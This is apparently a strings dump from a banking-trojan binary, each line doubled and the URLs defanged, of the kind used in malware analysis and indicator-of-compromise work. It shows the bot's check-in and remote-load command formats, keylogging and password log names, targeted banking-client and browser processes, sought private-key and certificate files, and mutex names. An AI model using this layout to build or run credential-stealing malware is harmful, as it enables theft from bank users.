Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
ntdll.dll
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
Global\HighMemoryEvent_x
explorer.exe
explorer.exe
1.2.5
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.bmp
u.bmp
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.bing.com
VVV.microsoft.com
VVV.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
/search.php
/search.php
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\java.exe
\java.exe
\javaw.exe
\javaw.exe
\javaws.exe
\javaws.exe
\opera.exe
\opera.exe
\firefox.exe
\firefox.exe
\maxthon.exe
\maxthon.exe
\avant.exe
\avant.exe
\mnp.exe
\mnp.exe
\safari.exe
\safari.exe
\netscape.exe
\netscape.exe
\tbb-firefox.exe
\tbb-firefox.exe
\frd.exe
\frd.exe
\isclient.exe
\isclient.exe
\ipc_full.exe
\ipc_full.exe
\intpro.exe
\intpro.exe
\cbsmain.dll
\cbsmain.dll
\clmain.exe
\clmain.exe
\core.exe
\core.exe
\rundll32.exe
\rundll32.exe
\notepad.exe
\notepad.exe
\cbank.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.dbf
%s.DBF
%s.DBF
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
client.zip
client.zip
path_client.txt
path_client.txt
path_keys.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
winmm.dll
%s\%s
%s\%s
LibVNCServer 0.9.7
LibVNCServer 0.9.7
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
MSVCRT.dll
MSVCRT.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
MapVirtualKeyW
MapVirtualKeyW
SetKeyboardState
SetKeyboardState
EnumChildWindows
EnumChildWindows
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
MSCTF.Shared.MAPPING.%x
Desk_%u%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
MSCTF.Shared.MUTEX.%x
.Prev
.Prev
.current
.current
ADM!XP1!F9BE9A8A
ADM!XP1!F9BE9A8A
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.ffffff00
MSCTF.Shared.MUTEX.ffffff00
%Documents and Settings%\%current user%\Application Data\
%Documents and Settings%\%current user%\Application Data\
1-191j1w1}1
1-191j1w1}1
?"?(?-?~?
?"?(?-?~?
;-;5;=;^;|;
;-;5;=;^;|;
7"7)7\7~7
7"7)7\7~7
6 6$6(6,6064686
6 6$6(6,6064686
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\